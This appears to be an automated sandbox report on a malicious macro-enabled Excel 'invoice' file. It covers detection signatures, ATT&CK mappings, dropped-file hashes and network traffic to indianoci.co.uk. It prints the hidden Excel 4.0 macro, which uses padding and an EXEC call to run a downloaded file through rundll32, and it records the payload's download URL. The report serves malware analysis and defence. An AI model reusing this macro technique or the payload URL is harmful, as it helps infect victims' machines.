Analysis Report invoice_661434949_67552437.xlsm
Overview
General Information
Detection
Hidden Macro 4.0
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
AV Detection: |
---|
Antivirus detection for URL or domain |
Source: | Avira URL Cloud: |
Multi AV Scanner detection for domain / URL |
Source: | Virustotal: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | File created: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Binary or memory string: |
Source: | Classification label: |
Source: | File created: |
Source: | File created: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Process information set: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
12% | Virustotal | Browse | ||
100% | Avira URL Cloud | phishing | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
indianoci.co.uk | 104.21.43.238 | true | false |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
true |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
104.21.43.238 | indianoci.co.uk | United States | 13335 | CLOUDFLARENETUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 385000 |
Start date: | 11.04.2021 |
Start time: | 00:10:56 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 29s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | invoice_661434949_67552437.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal80.expl.evad.winXLSM@3/10@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: |
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
104.21.43.238 | Get hash | malicious | Browse |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
indianoci.co.uk | Get hash | malicious | Browse |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 4318 |
Entropy (8bit): | 4.960548542883275 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1sFvJADh/pRsfsIszbGD:1j9jhjYjWK/lyH+kARADh/pmfsIsfGD |
MD5: | 10E7CF5F758D041A498D76EA11F368BE |
SHA1: | 3C05C54B7E39AFCE95E60A2A7410194E5AE63CB7 |
SHA-256: | 422424BA14F529B2193794441E7D7EA69E1598D00956375481D83699544B6735 |
SHA-512: | 94277567C383B1C5F30BE977B80660F5D0DD3888FBE2E99BB39397F004AD214CFC40D7ACFE0CCF9DEDF6E5B099DA0D8A4A9D2176B2D75A61EE50AD75BDC1E5EF |
Malicious: | false |
Reputation: | low |
IE Cache URL: | http://indianoci.co.uk/ufriends/support.php |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 169558 |
Entropy (8bit): | 7.988183859518103 |
Encrypted: | false |
SSDEEP: | 3072:KTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGv:KrV4mnVqbTEnRMs |
MD5: | 2A06BF86C977F9A29739FD65CE53B5BE |
SHA1: | 33C88641A06413C919903497577EEA54ED03FAA0 |
SHA-256: | 4C18B1BFA7CD6C6048A5637FF7F753B78435E70FAB6BA74125EC7D633F7A3F9F |
SHA-512: | 71E29BE3A7A31A7650892A599C88C99CB25BF4B60DD6172BAAF849036562E3E141605543FCACD9389D73B04535C270543B0B4D55272809EEA6ABFB2E3764D2C8 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 184279 |
Entropy (8bit): | 7.96535016571193 |
Encrypted: | false |
SSDEEP: | 3072:LZnURTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGhFF:LZn8rV4mnVqbTEnRM+ |
MD5: | A5BF33A3C05F7D7C3CFA963B69299E5A |
SHA1: | C60AC1F23B57458BFA14EC2350D5AC6481FAE008 |
SHA-256: | 7CFD1262A350CBA2D2A46D563F8A296EAF7CD151D6B14E0319003AD5A4D3BCB2 |
SHA-512: | B5BD5F924CCB9F12926F9055A402EF867C5EFC2C3A8D192C098267E4D59B30DC6AA829E29AC6BAB5E58E9EEEE0348B871C634F64F3BD4D8A7C396E63C80FE8B0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.474922313871348 |
Encrypted: | false |
SSDEEP: | 12:85QNm8LgXg/XAlCPCHaX7B8NB/c46X+Wnicvbw3+bDtZ3YilMMEpxRljK7PTdJP8:85M/XTr6Nt6Yek3SDv3qarNru/ |
MD5: | 02C3D67E8B5892845174D590F43538FD |
SHA1: | FC497AEBDD50C17B637780750F85649E615065A1 |
SHA-256: | 2B645F70EA210272EC0B84A998C9C79BA5A3B382375B7E7DC182397967FF1412 |
SHA-512: | FBB12C573E5B2513FA67123DBE2539CF455E3AC3BAD4EDAC939C9DD91F37A3B292E07A211D8E52345F94283230E9E5A39CD31A5473474B10F1BE057100C68408 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133 |
Entropy (8bit): | 4.7282044051464736 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWHnKb8W/g4p6YCULE8W/g4p6YCmxWHnKb8W/g4p6YCv:dj0nKbNgkz5ENgkzanKbNgkzs |
MD5: | 72BF292971159E1F67067B783778231A |
SHA1: | FAB451945E815CF506AC41935E3F8AF1B46C4D22 |
SHA-256: | 1751B59DDF72E20449AFEAF5EE7ED65962FCAEA8C35E089E2745CFE8A6C26B6D |
SHA-512: | 96E536B06D7261A9CB1E4B15706BC8A9AFF91E895FE42E266C32488BD5A654A205BBB93CBED107DCE03A860AE79C540ED57AFF2BD8709F16D7CF45B41997F3B3 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2198 |
Entropy (8bit): | 4.561386506168734 |
Encrypted: | false |
SSDEEP: | 48:84a/XT+NnlBv/3SBqaQh24a/XT+NnlBv/3SBqaQ/:84a/X6NnlBCBqaQh24a/X6NnlBCBqaQ/ |
MD5: | 687051452BC2F77D72B22F577901886B |
SHA1: | 2415855383CCE43DF59225BB87EA542AC47A6DC5 |
SHA-256: | 569E30D1479F86CD319B1A0C8B13E60FE62637A0E17B9A585AF4CD9371BEFA92 |
SHA-512: | E9B9814A3FDDB3B31182640EDB9D070D0322CDD467798AB619F9C511F00553B3AE058B8707C042D116118C69A8BA2B086CEEA60A8D509E4B5F8B63EF9D2419FB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 117 |
Entropy (8bit): | 4.293191264085757 |
Encrypted: | false |
SSDEEP: | 3:GmM/gVXWOg+DTRD7TEVmSVCqvGQQ1cldYUZvcSv:XM/RMRD7gmhEe105Bcc |
MD5: | 0955DECC24CF4729D752A9B53C933A4D |
SHA1: | EBDD0FEAA58E425364A68C558DFA56786E57341F |
SHA-256: | C8EEFEF799A43E339F93F6F644595C2648CCB467DE30AA301456BA20111D16C2 |
SHA-512: | 7B515D7B8A9BBED2B24470853CEC750F34F136591002DBA3161B95BF29AEBA7BCD2C70BA6FF698B9ABD355BDA83BB9C0B2B8611640BEDE176743DDD1E64E1E3B |
Malicious: | false |
Reputation: | low |
IE Cache URL: | indianoci.co.uk/ |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 184279 |
Entropy (8bit): | 7.96535016571193 |
Encrypted: | false |
SSDEEP: | 3072:LZnURTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMGhFF:LZn8rV4mnVqbTEnRM+ |
MD5: | A5BF33A3C05F7D7C3CFA963B69299E5A |
SHA1: | C60AC1F23B57458BFA14EC2350D5AC6481FAE008 |
SHA-256: | 7CFD1262A350CBA2D2A46D563F8A296EAF7CD151D6B14E0319003AD5A4D3BCB2 |
SHA-512: | B5BD5F924CCB9F12926F9055A402EF867C5EFC2C3A8D192C098267E4D59B30DC6AA829E29AC6BAB5E58E9EEEE0348B871C634F64F3BD4D8A7C396E63C80FE8B0 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4318 |
Entropy (8bit): | 4.960548542883275 |
Encrypted: | false |
SSDEEP: | 96:1j9jwIjYjyDK/DZD8jH+k1sFvJADh/pRsfsIszbGD:1j9jhjYjWK/lyH+kARADh/pmfsIsfGD |
MD5: | 10E7CF5F758D041A498D76EA11F368BE |
SHA1: | 3C05C54B7E39AFCE95E60A2A7410194E5AE63CB7 |
SHA-256: | 422424BA14F529B2193794441E7D7EA69E1598D00956375481D83699544B6735 |
SHA-512: | 94277567C383B1C5F30BE977B80660F5D0DD3888FBE2E99BB39397F004AD214CFC40D7ACFE0CCF9DEDF6E5B099DA0D8A4A9D2176B2D75A61EE50AD75BDC1E5EF |
Malicious: | false |
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.965561623864126 |
TrID: |
|
File name: | invoice_661434949_67552437.xlsm |
File size: | 184803 |
MD5: | 64f33ccbc7976306417b2b2528daa5fe |
SHA1: | d71433580e83ab455556a88c483d1887e9641be6 |
SHA256: | 03a7d4fc0e9d75fb98ca2aba43729acb93803959b1421d8878548643c12e3d73 |
SHA512: | f111800a5f1de2d2cec569448810eefd8999c99d9e78d5414b3bc662dbb607131a7a69f7236c929b769347d3430c9090c1144a3946c6a2d3d1d7d84236940ecf |
SSDEEP: | 3072:eSnTKkxqheGLo4/AGG5isVmXBdjHR1QnKq6JeMG9m:eSnrV4mnVqbTEnRML |
File Content Preview: | PK..........!."..Z....f.......[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "invoice_661434949_67552437.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,l,,l,..\GVer.iks,3"=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=SUM(1,1)=EXEC(""rund""&G12&G13&G14&G15&"" ""&F14&"",StartW"")",,2,,=RETURN(),,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 11, 2021 00:11:44.244446039 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.273181915 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.273291111 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.274460077 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.302973032 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.343449116 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.343504906 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.343533993 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:11:44.343570948 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.343597889 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:11:44.343604088 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:13:44.131885052 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
Apr 11, 2021 00:13:44.161051035 CEST | 80 | 49165 | 104.21.43.238 | 192.168.2.22 |
Apr 11, 2021 00:13:44.161395073 CEST | 49165 | 80 | 192.168.2.22 | 104.21.43.238 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 11, 2021 00:11:44.184062958 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
Apr 11, 2021 00:11:44.222151041 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Apr 11, 2021 00:11:44.184062958 CEST | 192.168.2.22 | 8.8.8.8 | 0xb648 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 11, 2021 00:11:44.222151041 CEST | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | 104.21.43.238 | A (IP address) | IN (0x0001) | ||
Apr 11, 2021 00:11:44.222151041 CEST | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | 172.67.189.4 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 104.21.43.238 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 11, 2021 00:11:44.274460077 CEST | 0 | OUT | |
Apr 11, 2021 00:11:44.343449116 CEST | 2 | IN |